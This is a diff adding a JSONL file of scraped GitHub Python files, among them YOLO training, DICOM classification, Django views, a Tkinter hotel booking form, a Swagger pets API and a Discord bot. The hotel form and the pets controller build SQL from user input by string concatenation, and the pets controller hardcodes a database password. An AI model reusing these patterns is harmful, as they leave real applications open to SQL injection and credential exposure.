diff --git "a/1109.jsonl" "b/1109.jsonl" new file mode 100644--- /dev/null +++ "b/1109.jsonl" @@ -0,0 +1,884 @@ +{"seq_id": "36367894857", "text": "from ultralytics import YOLO\n\nregions = ['33T', '52S', '53S', '54S', '54T']\n\ndef train_model(region):\n model = YOLO('yolov8s.pt', task='detect')\n model.to('cuda')\n results = model.train(\n data=region + '.yaml',\n degrees=180,\n scale=0.1,\n fliplr=0.0,\n imgsz=1312,\n epochs=100,\n batch=4,\n mosaic = 0.0,\n perspective = 0,\n resume=False,\n hsv_h=0.005,\n name=region + '_s')\n return results\n\ndef train_models(regions):\n for region in regions:\n train_model(region)\n return \n\ndef main():\n train_models(regions)\n\n\nif __name__ == '__main__':\n main()\n", "repo_name": "kyledmccleary/vlr-project", "sub_path": "code/helpers/yolotrain_multi.py", "file_name": "yolotrain_multi.py", "file_ext": "py", "file_size_in_byte": 655, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "ultralytics.YOLO", "line_number": 6, "usage_type": "call"}]} +{"seq_id": "22721468301", "text": "from keras.models import load_model\nimport numpy as np\nimport skimage\nimport pydicom\nimport os\n\n\nclass CustomError(Exception):\n pass\n\n\nclass AxialClassifier:\n\n def __init__(self, in_dir, out_dir = False):\n self.files_in_dir = in_dir\n self.files_out_dir = out_dir\n self.files_out_new_dirs = []\n self.file_list = [x for x in os.listdir(in_dir) if x.endswith(\".dcm\")]\n self.x = []\n self.model = None\n self.classified_list = []\n\n def import_model(self, model_path):\n self.model = load_model(model_path)\n\n def img_to_array_list(self):\n for filename in self.file_list:\n img = pydicom.dcmread(os.path.join(self.files_in_dir, filename)).pixel_array[:, :, 0]\n im_rez = skimage.transform.resize(img, (256, 256, 1))\n self.x.append(im_rez)\n if len(self.x) > 0:\n self.x = np.array(self.x)\n else:\n raise CustomError(f\"No Dicom files in directory: {self.files_in_dir}\")\n\n def classify_axis(self):\n prediction = self.model.predict(self.x)\n view_list = []\n confidence_list = []\n for i in prediction:\n if i[0] >= 0.5:\n view_list.append(1)\n else:\n view_list.append(0)\n confidence_list.append(round(float(i[0]), 2))\n\n self.classified_list = list(zip(self.file_list, view_list, confidence_list))\n return self.classified_list\n\n def move_files_to_new_folders(self):\n if not self.files_out_dir:\n self.files_out_dir = self.files_in_dir\n\n new_folder_appendices = [\"/sagittal\", \"/non_sagittal\"]\n self.files_out_new_dirs = [os.path.join(self.files_out_dir + x) for x in new_folder_appendices]\n\n for nd in self.files_out_new_dirs:\n new_folder = os.path.join(self.files_out_dir, nd)\n if not os.path.exists(new_folder):\n os.makedirs(new_folder)\n\n for item in self.classified_list:\n if item[1] == 1:\n os.rename(os.path.join(self.files_in_dir, item[0]),\n os.path.join(self.files_out_new_dirs[0], item[0]))\n else:\n os.rename(os.path.join(self.files_in_dir, item[0]),\n os.path.join(self.files_out_new_dirs[1], item[0]))\n\n\nif __name__ == \"__main__\":\n classifier = AxialClassifier(\"C:/Users/julix/Documents/temp/chierici eco/dcm/WV_PROVA_3_anonymized\")\n classifier.import_model(\"NN_model/model_even_better.h5\")\n classifier.img_to_array_list()\n print(classifier.classify_axis())\n classifier.move_files_to_new_folders()\n", "repo_name": "webvalley/wv-mongo-docker", "sub_path": "plic_pipeline_gui/plic_pipeline_gui/image_axial_classification.py", "file_name": 
"image_axial_classification.py", "file_ext": "py", "file_size_in_byte": 2636, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.listdir", "line_number": 18, "usage_type": "call"}, {"api_name": "keras.models.load_model", "line_number": 24, "usage_type": "call"}, {"api_name": "pydicom.dcmread", "line_number": 28, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 28, "usage_type": "call"}, {"api_name": "os.path", "line_number": 28, "usage_type": "attribute"}, {"api_name": "skimage.transform.resize", "line_number": 29, "usage_type": "call"}, {"api_name": "skimage.transform", "line_number": 29, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 32, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 55, "usage_type": "call"}, {"api_name": "os.path", "line_number": 55, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 58, "usage_type": "call"}, {"api_name": "os.path", "line_number": 58, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 59, "usage_type": "call"}, {"api_name": "os.path", "line_number": 59, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 60, "usage_type": "call"}, {"api_name": "os.rename", "line_number": 64, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 64, "usage_type": "call"}, {"api_name": "os.path", "line_number": 64, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 65, "usage_type": "call"}, {"api_name": "os.path", "line_number": 65, "usage_type": "attribute"}, {"api_name": "os.rename", "line_number": 67, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 67, "usage_type": "call"}, {"api_name": "os.path", "line_number": 67, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 68, "usage_type": "call"}, {"api_name": "os.path", "line_number": 68, "usage_type": "attribute"}]} +{"seq_id": "69817227370", "text": "from django.shortcuts import render\nfrom django.http import HttpResponse, HttpResponseNotFound\nfrom django.shortcuts import redirect\nfrom django.urls import reverse\nfrom django.template import loader\nfrom app.models import job_post\n\n\njob_title=[\n 'Job 01',\n 'job 02',\n 'Job 03'\n]\njob_discription=[\n 'This is the job discription for Job 01',\n 'This is the job discription for Job 02',\n 'This is the job discription for Job 03'\n]\nclass TempValue:\n value=50\n num=12\n \n# def hello(request):\n# template=loader.get_template('app/hello.html')\n# list=['first_item', 'second_item']\n# temp=TempValue()\n# context={'name': 'Django', 'list_item': list, 'temp_value': temp}\n# return HttpResponse(template.render(context, request))\n\ndef hello(request):\n # template=loader.get_template('app/hello.html')\n list=['first_item', 'second_item']\n temp=TempValue()\n isAuth=False\n context={'name': 'Django', 'list_item': list,'isAuth':isAuth , 'temp_value': temp}\n # return HttpResponse(template.render(context, request))\n return render(request, 'app/hello.html', context)\n\n\n\n\n# Create your views here.\ndef home_page(request):\n # output=''\n # for i in job_title:\n # job_id=job_title.index(i)\n # # url=f'job/{str(job_id)}'\n # url=(reverse('job_url', args=(job_id, )))\n # output+=(f'
{i} {job_discription[job_id]}
')\n \n # return HttpResponse(f\"{output}\")\n # # return HttpResponse(\"
Hello World
\")\n jobs=job_post.objects.all()\n context={'jobs':jobs}\n return render(request, \"app/index.html\", context)\n \n\n# def jobPage(request, id):\n# # print(id)\n# # id=id+1\n# if id > 2:\n# return redirect(reverse('home_page'))\n# # print(type(id))\n# # a=('this is a job page ',id)\n# # link= 'https://www.google.com'\n\n\n# return_html=f'
{job_title[id-1]} {job_discription[id-1]}
'\n# return HttpResponse(return_html)\n\ndef jobPage(request, id):\n jobs=job_post.objects.get(id=id )\n try:\n # return_html=f'
{job_title[id-1]} {job_discription[id-1]}
'\n # return HttpResponse(return_html)\n\n #old method\n #context={\"job_title\":job_title[id],'job_description':job_discription[id]}\n #return render(request, 'app\\job_details.html', context)\n\n #fetching from DB\n context={\"jobs\":jobs}\n return render(request, 'app\\job_details.html', context)\n except:\n return HttpResponseNotFound(\"Not found\")\n\n \n", "repo_name": "Vaibhavkatre005/django", "sub_path": "app/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 2589, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.shortcuts.render", "line_number": 37, "usage_type": "call"}, {"api_name": "app.models.job_post.objects.all", "line_number": 53, "usage_type": "call"}, {"api_name": "app.models.job_post.objects", "line_number": 53, "usage_type": "attribute"}, {"api_name": "app.models.job_post", "line_number": 53, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 55, "usage_type": "call"}, {"api_name": "app.models.job_post.objects.get", "line_number": 72, "usage_type": "call"}, {"api_name": "app.models.job_post.objects", "line_number": 72, "usage_type": "attribute"}, {"api_name": "app.models.job_post", "line_number": 72, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 83, "usage_type": "call"}, {"api_name": "django.http.HttpResponseNotFound", "line_number": 85, "usage_type": "call"}]} +{"seq_id": "15428907896", "text": "from tkinter import *\nfrom PIL import ImageTk,Image\nfrom tkinter import messagebox\nimport sqlite3\n\n#Connection to database\n#ENTER YOUR USER NAME AND PASSWORD TO CONNECT TO DATABASE\n\n\n#table connection\n\n\ndef addcustomer1():\n Lname = custInfo1.get()\n Rnb = custInfo2.get()\n Date=custInfo3.get()\n Nbr = custInfo4.get()\n P = custInfo5.get()\n \n \n insertRes = \"insert into checkin values('\"+Lname+\"','\"+Rnb+\"','\"+Date+\"','\"+Nbr+\",'\"+P+\"'')\"\n try:\n cur.execute(insertRes)\n con.commit()\n messagebox.showinfo('Success',\"Booked successfully\")\n except:\n messagebox.showinfo(\"Error\",\"Already booked\")\n \n print(Lname)\n print(Rnb)\n print(Date)\n print(Nbr)\n print(P)\n\n\n\ndef add_customer_details1():\n global custInfo1, custInfo2, custInfo3, custInfo4, custInfo5, Canvas1, con, cur, cust,root3\n\nroot3= Tk()\nroot3.title(\"Add Customer details\")\nroot3.minsize(width=400,height=400)\n#root3.iconbitmap(\"icons8_five_of_five_stars.ico\")\nroot3.geometry(\"600x500\")\n# root3.iconbitmap(\"icons8_hotel.ico\")\n\ncon = sqlite3.connect(\"Hotel__man.db\")\ncur = con.cursor()\n\nCanvas1 = Canvas(root3)\nCanvas1.config(bg=\"#E5D4B3\")\nCanvas1.pack(expand=True,fill=BOTH)\n\n\nheadingFrame1 = Frame(root3,bg=\"#DDC1A2\",bd=5)\nheadingFrame1.place(relx=0.25,rely=0.1,relwidth=0.5,relheight=0.13)\n\nheadingLabel = Label(headingFrame1, text=\"Add reservation\", bg='black', fg='white', font=('Courier',15))\nheadingLabel.place(relx=0,rely=0, relwidth=1, relheight=1)\n\n\nlabelFrame = Frame(root3,bg='black')\nlabelFrame.place(relx=0.1,rely=0.4,relwidth=0.8,relheight=0.4)\n\n#Last Name\nlb1 = Label(labelFrame,text=\"Full Name:\",bg='black',fg='white')\nlb1.place(relx=0.05,rely=0.2, relheight=0.08)\n\ncustInfo1 = Entry(labelFrame)\ncustInfo1.place(relx=0.3,rely=0.2, relwidth=0.62, relheight=0.08)\n\n\n#Room number\nlb2 = Label(labelFrame,text=\"Room number : \", bg='black', fg='white')\nlb2.place(relx=0.05,rely=0.35, relheight=0.08)\n \ncustInfo2 = 
Entry(labelFrame)\ncustInfo2.place(relx=0.3,rely=0.35, relwidth=0.62, relheight=0.08)\n\n#Issue Date\nlb3 = Label(labelFrame,text=\"Issue Date : \", bg='black', fg='white')\nlb3.place(relx=0.05,rely=0.50, relheight=0.08)\n \ncustInfo3 = Entry(labelFrame)\ncustInfo3.place(relx=0.3,rely=0.50, relwidth=0.62, relheight=0.08)\n\n#Number of days\nlb4 = Label(labelFrame,text=\"Number of days : \", bg='black', fg='white')\nlb4.place(relx=0.05,rely=0.65, relheight=0.08)\n \ncustInfo4 = Entry(labelFrame)\ncustInfo4.place(relx=0.3,rely=0.65, relwidth=0.62, relheight=0.08)\n\n\n#Payment method\nlb5 = Label(labelFrame,text=\"Cash/Credit card : \", bg='black', fg='white')\nlb5.place(relx=0.05,rely=0.80, relheight=0.08)\n \ncustInfo5 = Entry(labelFrame)\ncustInfo5.place(relx=0.3,rely=0.80, relwidth=0.62, relheight=0.08)\n\n\n\n#Submit Button\nSubmitBtn = Button(root3,text=\"Add Reservation\",bg='#47290F', fg='white',command=addcustomer1)\nSubmitBtn.place(relx=0.28,rely=0.9, relwidth=0.18,relheight=0.08)\n\nquitBtn = Button(root3,text=\"Quit\",bg='#47290F', fg='white', command=root3.destroy)\nquitBtn.place(relx=0.53,rely=0.9, relwidth=0.18,relheight=0.08)\n\nroot3.mainloop()\n", "repo_name": "SoukainaOujaa/Hotel_Management_System_Python", "sub_path": "adduser1.py", "file_name": "adduser1.py", "file_ext": "py", "file_size_in_byte": 3105, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "tkinter.messagebox.showinfo", "line_number": 25, "usage_type": "call"}, {"api_name": "tkinter.messagebox", "line_number": 25, "usage_type": "name"}, {"api_name": "tkinter.messagebox.showinfo", "line_number": 27, "usage_type": "call"}, {"api_name": "tkinter.messagebox", "line_number": 27, "usage_type": "name"}, {"api_name": "sqlite3.connect", "line_number": 47, "usage_type": "call"}]} +{"seq_id": "1941086451", "text": "import gzip\nimport os\nimport pickle\nimport sys\nfrom collections import defaultdict\n\nimport fasttext\n\nurl_info_dict = defaultdict(dict)\nnum_url_lines = 0\nprint(\"reading url info dict\")\nfor line in open(os.path.abspath(sys.argv[1])):\n try:\n word, correspond_file_path, page_url, image_link = line.strip().split()\n url_info_dict[page_url][correspond_file_path] = word\n num_url_lines += 1\n except:\n pass\nprint(\"length of url info dict\", len(url_info_dict), num_url_lines)\n\npickle_folder = os.path.abspath(sys.argv[2])\ntarget_lang = sys.argv[5]\nfasttext_path = os.path.abspath(sys.argv[6])\nfasttext_model = fasttext.load_model(fasttext_path)\nfasttext_lang = \"__label__\" + target_lang\n\nwrite_count = 0\nwith gzip.open(os.path.abspath(sys.argv[3]), \"wt\") as writer, gzip.open(os.path.abspath(sys.argv[4]),\n \"wt\") as short_writer:\n for f in os.listdir(pickle_folder):\n if not f.endswith(\".pickle.gz\"):\n continue\n print(f, write_count)\n current_output = []\n current_short_output = []\n with gzip.open(os.path.join(pickle_folder, f), \"rb\") as fin:\n cur_dict = pickle.load(fin)\n for target_url in cur_dict.keys():\n try:\n body_list = [sentence for sentence in cur_dict[target_url][\"body\"].values() if \"::\" not in sentence]\n fasttext_pred = fasttext_model.predict(body_list)\n body_list = [sentence for i, sentence in enumerate(body_list) if\n fasttext_pred[0][i][0] == fasttext_lang and fasttext_pred[1][i][0] > 0.95]\n\n if len(body_list) == 0:\n continue\n\n body_text = \"\\t\".join(body_list)\n\n for file_path, word in url_info_dict[target_url].items():\n if target_url in url_info_dict and word.lower() in 
body_text.lower():\n whole_text = word + \"\\t\" + file_path + \"\\t\" + body_text\n # Doing this to make sure that the text is ok\n t = whole_text.encode(\"utf-8\")\n\n short_body = [body for body in body_list if word.lower() in body.lower()]\n short_text = \"\\t\".join([word, file_path] + short_body)\n current_output.append(whole_text)\n current_short_output.append(short_text)\n write_count += 1\n except:\n pass\n writer.write(\"\\n\".join(current_output))\n writer.write(\"\\n\")\n short_writer.write(\"\\n\".join(current_short_output))\n short_writer.write(\"\\n\")\n\nprint(\"finished\", write_count)\n", "repo_name": "rasoolims/mmid_explore", "sub_path": "collect_passage_for_target_urls.py", "file_name": "collect_passage_for_target_urls.py", "file_ext": "py", "file_size_in_byte": 2814, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "collections.defaultdict", "line_number": 9, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path", "line_number": 12, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 12, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path", "line_number": 21, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 21, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 22, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 23, "usage_type": "call"}, {"api_name": "os.path", "line_number": 23, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 23, "usage_type": "attribute"}, {"api_name": "fasttext.load_model", "line_number": 24, "usage_type": "call"}, {"api_name": "gzip.open", "line_number": 28, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 28, "usage_type": "call"}, {"api_name": "os.path", "line_number": 28, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 28, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 30, "usage_type": "call"}, {"api_name": "gzip.open", "line_number": 36, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 36, "usage_type": "call"}, {"api_name": "os.path", "line_number": 36, "usage_type": "attribute"}, {"api_name": "pickle.load", "line_number": 37, "usage_type": "call"}]} +{"seq_id": "12453716786", "text": "import matplotlib.pyplot as plt\nimport numpy as np\nfrom scipy.optimize import curve_fit\nimport os\n\nfile=\"moments.dat\";\nmydata = np.loadtxt(file,skiprows=1,unpack=True)\n\ny=mydata[0]\nkappa1_avg=mydata[1]\nk1error=mydata[2]\nkappa2_avg=mydata[3]\nk2error=mydata[4]\nkappa3_avg=mydata[5]\nk3error=mydata[6]\nkappa4_avg=mydata[7]\nk4error=mydata[8]\nomega=mydata[9]\nwerror=mydata[10]\nSsigma=mydata[11]\nSerror=mydata[12]\nKsigma2=mydata[13]\nKerror=mydata[14]\nc3c1=mydata[15]\nc3c1error=mydata[16]\nc4c3=mydata[17]\nc4c3error=mydata[18]\n\ndef parabola(y, a, b):\n return a*y**2 + b\ndef gaussian(y, A, sigma):\n return A*np.exp(-y**2/(2*sigma**2))/(np.sqrt(2*np.pi*abs(sigma)))\ndef quartic(y, A, B, C):\n return A*y**4+B*y**2+C\ndef hexic(y, A, B, C, D):\n return A*y**6+B*y**4+C*y**2+D\n\nfig=plt.figure(figsize=(8,12))\nax1 = fig.add_subplot(211)\nplt.ylabel('$C_3/C_1$', fontsize=22, weight='normal')\nax2 = fig.add_subplot(212)\nplt.ylabel('$C_4/C_3$', fontsize=22, weight='normal')\n\n\nparam, param_cov = curve_fit(parabola, y, c3c1)\nparab = 
param[0]*(y)**2+param[1]\nparam, param_cov = curve_fit(quartic, y, c3c1)\nquart = param[0]*y**4+param[1]*y**2+param[2]\n#param, param_cov = curve_fit(hexic, y, c3c1)\n#hex = param[0]*y**6+param[1]*y**4+param[2]*y**2+param[3]\nax1.errorbar(y,c3c1,c3c1error,linestyle='',linewidth=2,markersize=8,color='b', marker='d', markerfacecolor=None, markeredgecolor=None)\nax1.plot(y,parab,linestyle='-',color='b')\nax1.plot(y,quart,linestyle=':',color='b')\n#ax1.plot(y,hex,linestyle='--',color='b')\n\nparam, param_cov = curve_fit(parabola, y, c4c3)\nparab = (param[0]*(y)**2+param[1])\nparam, param_cov = curve_fit(quartic, y, c4c3)\nquart = param[0]*y**4+param[1]*y**2+param[2]\nax2.errorbar(y,c4c3,c4c3error,linestyle='',linewidth=2,markersize=8,color='k', marker='^', markerfacecolor=None, markeredgecolor=None)\nax2.plot(y,parab,linestyle='-',color='k')\nax2.plot(y,quart,linestyle=':',color='k')\nplt.xlabel('y',fontsize=18 , weight='normal')\n\nplt.savefig('figs/altratios.pdf',format='pdf')\nos.system('xdg-open figs/altratios.pdf')\nquit()\n", "repo_name": "scottedwardpratt/fluxtubes", "sub_path": "rachelrun/altratios.py", "file_name": "altratios.py", "file_ext": "py", "file_size_in_byte": 2044, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.loadtxt", "line_number": 7, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 32, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 32, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 32, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 38, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 38, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 40, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 40, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 42, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 42, "usage_type": "name"}, {"api_name": "scipy.optimize.curve_fit", "line_number": 45, "usage_type": "call"}, {"api_name": "scipy.optimize.curve_fit", "line_number": 47, "usage_type": "call"}, {"api_name": "scipy.optimize.curve_fit", "line_number": 56, "usage_type": "call"}, {"api_name": "scipy.optimize.curve_fit", "line_number": 58, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 63, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 63, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 65, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 65, "usage_type": "name"}, {"api_name": "os.system", "line_number": 66, "usage_type": "call"}]} +{"seq_id": "6743177715", "text": "import connexion\nimport six\nimport mysql.connector\n\nfrom swagger_server.models.error import Error # noqa: E501\nfrom swagger_server.models.pets import Pets # noqa: E501\nfrom swagger_server import util\nimport json\n\n\n\ndef _convert_to_json(description, query_results):\n headers=[x[0] for x in description]\n\n json_data=[]\n\n for result in query_results:\n json_data.append(dict(zip(headers, result)))\n\n return json_data\n\n\n\ndef create_pets(): # noqa: E501\n \"\"\"Create a pet\n\n # noqa: E501\n\n\n :rtype: None\n \"\"\"\n return 'do some magic!'\n\n\ndef list_pets(limit=None): # noqa: E501\n mydb = mysql.connector.connect(\n host=\"localhost\",\n user=\"swagger_user\",\n password=\"haslo123\",\n 
database=\"swagger\"\n )\n mycursor = mydb.cursor()\n\n mycursor.execute(\"SELECT * FROM pets\")\n\n result = json.dumps(_convert_to_json(\n mycursor.description, mycursor.fetchall()))\n\n print(result)\n\n return json.loads(result)\n\n\ndef show_pet_by_id(petId): # noqa: E501\n mydb = mysql.connector.connect(\n host=\"localhost\",\n user=\"swagger_user\",\n password=\"haslo123\",\n database=\"swagger\"\n )\n mycursor = mydb.cursor()\n\n mycursor.execute(f\"SELECT * FROM pets WHERE id ={petId}\")\n\n result = json.dumps(_convert_to_json(\n mycursor.description, mycursor.fetchall()))\n\n print(type(result[0]), result[0])\n\n return json.loads(result)[0]\n", "repo_name": "Kadziok/Swagger_test", "sub_path": "swagger_server/controllers/pets_controller.py", "file_name": "pets_controller.py", "file_ext": "py", "file_size_in_byte": 1434, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "mysql.connector.connector.connect", "line_number": 36, "usage_type": "call"}, {"api_name": "mysql.connector.connector", "line_number": 36, "usage_type": "attribute"}, {"api_name": "mysql.connector", "line_number": 36, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 46, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 51, "usage_type": "call"}, {"api_name": "mysql.connector.connector.connect", "line_number": 55, "usage_type": "call"}, {"api_name": "mysql.connector.connector", "line_number": 55, "usage_type": "attribute"}, {"api_name": "mysql.connector", "line_number": 55, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 65, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 70, "usage_type": "call"}]} +{"seq_id": "30065332395", "text": "import sys, os\nsys.path.append(os.path.dirname(os.path.dirname(os.getcwd() + '/' + __file__)))\nfrom tsmnet import Stretcher\nimport torch, torchaudio\nfrom pathlib import Path\nimport numpy as np\nimport librosa\nimport sox\nimport argparse\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('audio_list', help='A file containing audio filenames. One song each line.', type=Path)\n parser.add_argument('weight_dir', help='e.g. ../scripts/logs-fma/weights', type=Path)\n parser.add_argument('CR', help='Compression ratio. e.g. 1024. 
Can also be `librosa` or `sox`', type=str)\n parser.add_argument('-o', '--out_dir', default='samples', help='output directory', type=Path)\n \n args = parser.parse_args()\n return args\n\ndef files_to_list(filename):\n \"\"\"\n Takes a text file of filenames and makes a list of filenames\n \"\"\"\n with open(filename, encoding=\"utf-8\") as f:\n files = f.readlines()\n\n files = [Path(f.rstrip()) for f in files]\n return files\n\ndef main():\n args = parse_args()\n # initialize different stretchers\n if str(args.weight_dir) == 'sox':\n tfm = sox.transform.Transformer()\n elif str(args.weight_dir) != 'librosa':\n stretcher = Stretcher(args.weight_dir)\n \n files = files_to_list(args.audio_list)\n\n for file in files:\n (args.out_dir / file.stem / args.CR).mkdir(parents=True, exist_ok=True)\n x, sr = torchaudio.load(file)\n x = torchaudio.transforms.Resample(orig_freq=sr, new_freq=22050)(x)\n sr = 22050\n if str(args.weight_dir) == 'librosa' or str(args.weight_dir) == 'sox':\n x = x.numpy()\n\n for rate in ['0.5', '0.75', '1.0', '1.25', '1.5', '1.75', '2.0']:\n if str(args.weight_dir) == 'librosa':\n if len(x.shape) == 1:\n x_scaled = librosa.effects.time_stretch(x, float(rate))\n else:\n x_scaled = [ librosa.effects.time_stretch(x[0], float(rate)) ]\n for i in range(1, len(x.shape)):\n x_scaled.append(librosa.effects.time_stretch(x[i], float(rate)))\n x_scaled = np.array(x_scaled)\n elif str(args.weight_dir) == 'sox':\n tfm.tempo(float(rate))\n if len(x.shape) == 1:\n x_scaled = tfm.build_array(input_array=x, sample_rate_in=sr)\n else:\n x_scaled = [ tfm.build_array(input_array=x[0], sample_rate_in=sr) ]\n for i in range(1, len(x.shape)):\n x_scaled.append(tfm.build_array(input_array=x[i], sample_rate_in=sr))\n x_scaled = np.array(x_scaled)\n else:\n x_scaled = stretcher(x, float(rate))\n fname = str(args.out_dir / file.stem / args.CR / (rate + '.mp3'))\n print(f'writing {fname}')\n torchaudio.save(fname, torch.from_numpy(x_scaled), sr)\n \nif __name__ == \"__main__\":\n main()", "repo_name": "ernestchu/tsm-net", "sub_path": "scripts/generate-samples.py", "file_name": "generate-samples.py", "file_ext": "py", "file_size_in_byte": 3000, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sys.path.append", "line_number": 2, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 2, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 2, "usage_type": "call"}, {"api_name": "os.path", "line_number": 2, "usage_type": "attribute"}, {"api_name": "os.getcwd", "line_number": 2, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 12, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 13, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 14, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 16, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 28, "usage_type": "call"}, {"api_name": "sox.transform.Transformer", "line_number": 35, "usage_type": "call"}, {"api_name": "sox.transform", "line_number": 35, "usage_type": "attribute"}, {"api_name": "tsmnet.Stretcher", "line_number": 37, "usage_type": "call"}, {"api_name": "torchaudio.load", "line_number": 43, "usage_type": "call"}, {"api_name": "torchaudio.transforms.Resample", "line_number": 44, "usage_type": "call"}, {"api_name": "torchaudio.transforms", "line_number": 44, "usage_type": "attribute"}, {"api_name": "librosa.effects.time_stretch", "line_number": 
52, "usage_type": "call"}, {"api_name": "librosa.effects", "line_number": 52, "usage_type": "attribute"}, {"api_name": "librosa.effects.time_stretch", "line_number": 54, "usage_type": "call"}, {"api_name": "librosa.effects", "line_number": 54, "usage_type": "attribute"}, {"api_name": "librosa.effects.time_stretch", "line_number": 56, "usage_type": "call"}, {"api_name": "librosa.effects", "line_number": 56, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 57, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 66, "usage_type": "call"}, {"api_name": "torchaudio.save", "line_number": 71, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 71, "usage_type": "call"}]} +{"seq_id": "5461820321", "text": "import datetime\nimport os\nfrom pathlib import Path\nimport discord\nfrom discord.ext import commands\nfrom dotenv import load_dotenv\nfrom datetime import datetime\n\nload_dotenv(\"Bot.env\")\n\nbot = commands.Bot(command_prefix=commands.when_mentioned_or(\"$\"), intents=discord.Intents.all(),\n case_insensitive=True, description=\"Bot description\", help_command=None, auto_sync_commands=True\n )\n\nnow = datetime.now()\ndt_string = now.strftime(\"%d/%m/%Y %H:%M:%S\")\n\n\n@bot.event\nasync def on_ready():\n print('---------------------------')\n print(dt_string)\n print('Logged in as:')\n print(bot.user.name)\n print(bot.user.id)\n print('---------------------------')\n await bot.change_presence(activity=discord.Activity(type=discord.ActivityType.watching, name=\"Game-Energy Discord\"),\n status=discord.Status.idle)\n\n\ndef extensions():\n files = Path(\"cogs\").rglob(\"*.py\")\n for file in files:\n yield file.as_posix()[:-3].replace(\"/\", \".\")\n\n\ndef load():\n for ext_file in extensions():\n try:\n bot.load_extension(ext_file)\n print(f\"Loaded {ext_file}\")\n except Exception as ex:\n print(f\"Failed to load {ext_file}: {ex}\")\n\n\ndef unload():\n for ext_file in extensions():\n try:\n bot.unload_extension(ext_file)\n print(f\"Unloaded {ext_file}\")\n except Exception as ex:\n print(f\"Failed to unload {ext_file}: {ex}\")\n\n\nasync def client_reload():\n unload()\n load()\n print(\"\")\n print(f\"Reloaded at {dt_string}\")\n print(\"\")\n\n@bot.command()\nasync def reload(ctx):\n await client_reload()\n embed = discord.Embed(title=\"Reload abgeschlossen!\", colour=discord.Colour.red(),\n description=\"Alle Module des Discord Bots wurden erfolgreich neu geladen\")\n embed.set_footer(text=f\"Reload wurde von {ctx.author} ausgelöst\",\n icon_url=\"https://cdn.max1021.de/G-E/GameEnergy_Green.png\")\n await ctx.send(embed=embed)\n\n\n@bot.event\nasync def on_command_error(ctx: commands.Context, error):\n if ctx.invoked_with in [\"rename\", \"close\"]:\n return\n embed = discord.Embed(title=\"Es ist ein Fehler aufgetreten\", colour=discord.Colour.red(),\n description=f\"Bei der Ausführung des Commands ist ein Fehler aufgetreten.\\n \"\n f\"**Error:** {error}\")\n await ctx.send(embed=embed)\n\n\nif __name__ == \"__main__\":\n load()\n 